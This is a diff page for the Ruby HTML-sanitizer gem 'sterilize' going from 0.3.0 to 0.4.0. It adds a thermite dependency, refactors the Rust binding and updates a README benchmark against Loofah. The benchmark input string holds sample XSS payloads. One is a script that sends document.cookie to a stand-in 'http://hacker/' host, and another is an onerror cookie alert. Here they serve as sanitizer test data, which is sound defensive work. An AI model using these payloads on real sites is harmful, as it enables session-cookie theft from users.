sterilize 0.3.0 → 0.4.0
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/Gemfile.lock +8 -1
- data/README.md +9 -8
- data/lib/sterilize/version.rb +1 -1
- data/src/lib.rs +3 -2
- data/sterilize.gemspec +2 -0
- metadata +15 -1
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: 530a4e6175b009628c886e6cedee437f49f273c1585cde7dea5cb551a92f3329
|
|
4
|
+
data.tar.gz: 2c073cbab31aebc2a30ab371915b6b42c0216a62b9dfbba19b8af8fbc7f55b24
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: edc995bfee0167ae39e7c811cc879487b695eaab0efc71fd74639fbddf0ca512dd5e31c5b3d0ca2cea35cea37190288c5163fcc97f9df9239b52bc483d04208a
|
|
7
|
+
data.tar.gz: a5cb40366218797d21a85774a63c5e9f4784dfa27f7c79e1be92b91fd061cafb7b2db5d4ca94a83cdee1c37a437ff702378069c20aee3b7296d940ce670a2dc2
|
data/Gemfile.lock
CHANGED
|
@@ -1,13 +1,15 @@
|
|
|
1
1
|
PATH
|
|
2
2
|
remote: .
|
|
3
3
|
specs:
|
|
4
|
-
sterilize (0.
|
|
4
|
+
sterilize (0.4.0)
|
|
5
5
|
rutie (~> 0.0.4)
|
|
6
|
+
thermite (~> 0.13)
|
|
6
7
|
|
|
7
8
|
GEM
|
|
8
9
|
remote: https://rubygems.org/
|
|
9
10
|
specs:
|
|
10
11
|
diff-lcs (1.3)
|
|
12
|
+
minitar (0.9)
|
|
11
13
|
rake (10.4.2)
|
|
12
14
|
rspec (3.8.0)
|
|
13
15
|
rspec-core (~> 3.8.0)
|
|
@@ -23,6 +25,11 @@ GEM
|
|
|
23
25
|
rspec-support (~> 3.8.0)
|
|
24
26
|
rspec-support (3.8.2)
|
|
25
27
|
rutie (0.0.4)
|
|
28
|
+
thermite (0.13.0)
|
|
29
|
+
minitar (~> 0.5)
|
|
30
|
+
rake (>= 10)
|
|
31
|
+
tomlrb (~> 1.2)
|
|
32
|
+
tomlrb (1.2.8)
|
|
26
33
|
|
|
27
34
|
PLATFORMS
|
|
28
35
|
ruby
|
data/README.md
CHANGED
|
@@ -13,15 +13,16 @@ Take a look at the specs directory to see some of the cases that get handled. Th
|
|
|
13
13
|
Finally, Sterilize is _fast_.
|
|
14
14
|
|
|
15
15
|
```ruby
|
|
16
|
-
unsafe_string = "I am nice safe user input, nothing to see here.. <script>console.log('installing bitcoin miner')</script><SCRIPT>var+img=new+Image();img.src='http://hacker/'%20+%20document.cookie;</SCRIPT><img src='http://url.to.file.which/not.exist' onerror=alert(document.cookie);><a href='data:text/html;base64,PHNjcmlwdD5hbGVydCgna25pZ2h0c3RpY2sgd2FzIGhlcmUnKTwvc2NyaXB0Pg=='>HACK HACK HACK</a>" *
|
|
16
|
+
unsafe_string = "I am nice safe user input, nothing to see here.. <script>console.log('installing bitcoin miner')</script><SCRIPT>var+img=new+Image();img.src='http://hacker/'%20+%20document.cookie;</SCRIPT><img src='http://url.to.file.which/not.exist' onerror=alert(document.cookie);><a href='data:text/html;base64,PHNjcmlwdD5hbGVydCgna25pZ2h0c3RpY2sgd2FzIGhlcmUnKTwvc2NyaXB0Pg=='>HACK HACK HACK</a>" * 1000
|
|
17
|
+
|
|
17
18
|
|
|
18
19
|
Benchmark.bm do | benchmark |
|
|
19
|
-
benchmark.report("Sterilize") do
|
|
20
|
+
benchmark.report("Sterilize#perform") do
|
|
20
21
|
50.times do
|
|
21
22
|
Sterilize.perform(unsafe_string)
|
|
22
23
|
end
|
|
23
24
|
end
|
|
24
|
-
benchmark.report("Loofah") do
|
|
25
|
+
benchmark.report("Loofah.scrub_fragment(unsafe_string, :prune).to_str") do
|
|
25
26
|
50.times do
|
|
26
27
|
Loofah.scrub_fragment(unsafe_string, :prune).to_str
|
|
27
28
|
end
|
|
@@ -29,12 +30,12 @@ Benchmark.bm do | benchmark |
|
|
|
29
30
|
end
|
|
30
31
|
```
|
|
31
32
|
|
|
32
|
-
As you can see, Sterilize can operate significatnly faster. As with all benchmarks though, your mileage may vary and it's important to see how things work in practice for you.
|
|
33
|
+
As you can see, Sterilize can operate significatnly faster (somewhere in the ballpark of 9-10 times faster). As with all benchmarks though, your mileage may vary and it's important to see how things work in practice for you.
|
|
33
34
|
|
|
34
|
-
| Library
|
|
35
|
-
|
|
|
36
|
-
| Sterilize
|
|
37
|
-
| Loofah
|
|
35
|
+
| Library | user | system | total | real |
|
|
36
|
+
| --------------------------------------------------- | ---------- | -------- | ---------- | ------------ |
|
|
37
|
+
| Sterilize#perform | 1.284460 | 0.006097 | 1.290557 | ( 1.295062) |
|
|
38
|
+
| Loofah.scrub_fragment(unsafe_string, :prune).to_str | 10.183802 | 0.064826 | 10.248628 | ( 10.274430) |
|
|
38
39
|
|
|
39
40
|
## Installation
|
|
40
41
|
|
data/lib/sterilize/version.rb
CHANGED
data/src/lib.rs
CHANGED
|
@@ -11,8 +11,9 @@ methods!(
|
|
|
11
11
|
Sterilize,
|
|
12
12
|
_itself,
|
|
13
13
|
fn perform(input: RString) -> RString {
|
|
14
|
-
let
|
|
15
|
-
let
|
|
14
|
+
let dirty_r_string = input.map_err(|e| VM::raise_ex(e)).unwrap();
|
|
15
|
+
let dirty_string = dirty_r_string.to_str();
|
|
16
|
+
let sterile = clean(dirty_string);
|
|
16
17
|
RString::new_utf8(&sterile)
|
|
17
18
|
}
|
|
18
19
|
);
|
data/sterilize.gemspec
CHANGED
|
@@ -27,6 +27,8 @@ Gem::Specification.new do |spec|
|
|
|
27
27
|
|
|
28
28
|
spec.add_dependency 'rutie', '~> 0.0.4'
|
|
29
29
|
|
|
30
|
+
spec.add_runtime_dependency 'thermite', '~> 0.13'
|
|
31
|
+
|
|
30
32
|
spec.add_development_dependency "bundler", "~> 2.0"
|
|
31
33
|
spec.add_development_dependency "rake", "~> 10.0"
|
|
32
34
|
spec.add_development_dependency "rspec", "~> 3.6"
|
metadata
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: sterilize
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 0.
|
|
4
|
+
version: 0.4.0
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- Martin Feckie
|
|
@@ -24,6 +24,20 @@ dependencies:
|
|
|
24
24
|
- - "~>"
|
|
25
25
|
- !ruby/object:Gem::Version
|
|
26
26
|
version: 0.0.4
|
|
27
|
+
- !ruby/object:Gem::Dependency
|
|
28
|
+
name: thermite
|
|
29
|
+
requirement: !ruby/object:Gem::Requirement
|
|
30
|
+
requirements:
|
|
31
|
+
- - "~>"
|
|
32
|
+
- !ruby/object:Gem::Version
|
|
33
|
+
version: '0.13'
|
|
34
|
+
type: :runtime
|
|
35
|
+
prerelease: false
|
|
36
|
+
version_requirements: !ruby/object:Gem::Requirement
|
|
37
|
+
requirements:
|
|
38
|
+
- - "~>"
|
|
39
|
+
- !ruby/object:Gem::Version
|
|
40
|
+
version: '0.13'
|
|
27
41
|
- !ruby/object:Gem::Dependency
|
|
28
42
|
name: bundler
|
|
29
43
|
requirement: !ruby/object:Gem::Requirement
|